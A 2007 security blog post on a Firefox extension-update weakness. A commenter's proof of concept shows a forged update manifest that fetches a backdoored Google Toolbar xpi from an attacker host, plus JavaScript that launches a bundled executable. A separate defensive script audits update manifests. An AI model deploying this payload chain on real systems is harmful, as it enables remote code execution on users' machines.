Firefox Hash

21.05.2007


Firefox advisory MD5 hash : 1A0E6F146C273A1D7513392A1DEB12F0

After this, this and this, it's like this from now on :)

Comments


Now that's more like it; it's enough if you just pay as much attention to their security as the company itself does :)

SW [ # | 21.05.2007 ]

http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0535.html

Very good and detailed advisory,
I came up with the same issue about one month ago and developed two PoCs.

Here is the hash: http://ferruh.mavituna.com/makale/firefox-hash/ (shame on
me that I haven't sent it to any public mailing list. If you are really curious,
check out RSS caches and Google cache) and a brief explanation is in the attachment
(Firefox-MITM.txt).

I attached the Google Toolbar PoC. Be careful, it's throwing a reverse shell. Also,
I've got a PoC for Linux as well.

To clarify things, you can execute arbitrary code with the current user's
rights.

Here is some sample code,
--------------------
// Path of the executable shipped inside the extension's chrome directory
var exepath = Components.classes["@mozilla.org/file/directory_service;1"]
    .getService(Components.interfaces.nsIProperties)
    .get("ProfD", Components.interfaces.nsIFile).path +
    "\\extensions\\{3112ca9c-de6d-4884-a869-9855de68056c}\\chrome\\svchost.exe";
runFile(exepath);

// Launches the file at path f as a process with the current user's rights
function runFile(f) {
    var file = Components.classes["@mozilla.org/file/local;1"]
        .createInstance(Components.interfaces.nsILocalFile);
    file.initWithPath(f);

    var process = Components.classes["@mozilla.org/process/util;1"]
        .createInstance(Components.interfaces.nsIProcess);
    process.init(file);

    var args = [""];
    process.run(false, args, args.length); // false = do not block the caller
}

--------------------

Sample update response XML,
----------
<?xml version="1.0"?>
<RDF:RDF xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <RDF:Description about="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}">
    <em:updates><RDF:Seq>
      <RDF:li resource="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:4.0.0.16"/>
    </RDF:Seq></em:updates>
  </RDF:Description>
  <RDF:Description about="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:4.0.0.16">
    <em:version>4.0.0.16</em:version>
    <em:targetApplication><RDF:Description>
      <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
      <em:minVersion>1.5.0</em:minVersion>
      <em:maxVersion>2.9.99</em:maxVersion>
      <em:updateLink>http://192.168.1.130/firefox/google.xpi</em:updateLink>
    </RDF:Description></em:targetApplication>
  </RDF:Description>
</RDF:RDF>
----------
This is our backdoored xpi file URL:
http://192.168.1.130/firefox/google.xpi
I modified google-toolbar.xul and added code to run the svchost.exe file, which is
in the xpi file as well.

A sample xpi file is attached, a modified version of the Google Toolbar extension,
and it will work every time you launch Firefox.

Ferruh Mavituna [ # | 12.02.2008 ]
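
A defender-side check for the condition described in the comment above, as an added example that is not part of the original post or comment: it parses an update response in the same RDF format and flags plaintext delivery and an `updateLink` that has no accompanying `em:updateHash`. The function name, the sample host and the accepted-digest policy are assumptions of this example; `em:updateHash` belongs to the em-rdf update-manifest schema but does not appear on the page.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RDF = "http://www.w3.org/1999/02/22-rdf-syntax-ns#"
EM = "http://www.mozilla.org/2004/em-rdf#"
# Assumed policy for this example: accept only these digest prefixes.
STRONG = ("sha256:", "sha384:", "sha512:")

# Constructed sample in the shape of the update response quoted above;
# the host name is a placeholder.
SAMPLE = """<?xml version="1.0"?>
<RDF:RDF xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns:em="http://www.mozilla.org/2004/em-rdf#">
 <RDF:Description about="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:4.0.0.16">
  <em:version>4.0.0.16</em:version>
  <em:targetApplication><RDF:Description>
   <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
   <em:updateLink>http://updates.example.test/google.xpi</em:updateLink>
  </RDF:Description></em:targetApplication>
 </RDF:Description>
</RDF:RDF>"""


def audit_update_manifest(xml_text, fetched_from):
    """Return findings for one update response (empty list = no issue found)."""
    findings = []
    if urlparse(fetched_from).scheme != "https":
        findings.append("manifest fetched over plaintext: " + fetched_from)
    # Note: use a hardened parser (e.g. defusedxml) for untrusted input.
    root = ET.fromstring(xml_text)
    for target in root.iter("{%s}targetApplication" % EM):
        for desc in target.iter("{%s}Description" % RDF):
            link = (desc.findtext("{%s}updateLink" % EM) or "").strip()
            digest = (desc.findtext("{%s}updateHash" % EM) or "").strip()
            if not link:
                continue
            if urlparse(link).scheme != "https":
                findings.append("updateLink is not https: " + link)
            if not digest.lower().startswith(STRONG):
                findings.append("no strong updateHash for " + link)
    return findings


if __name__ == "__main__":
    for f in audit_update_manifest(SAMPLE, "http://updates.example.test/update.rdf"):
        print("FINDING:", f)
```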

Ferruh Mavituna
© 2002-2007, Ferruh Mavituna
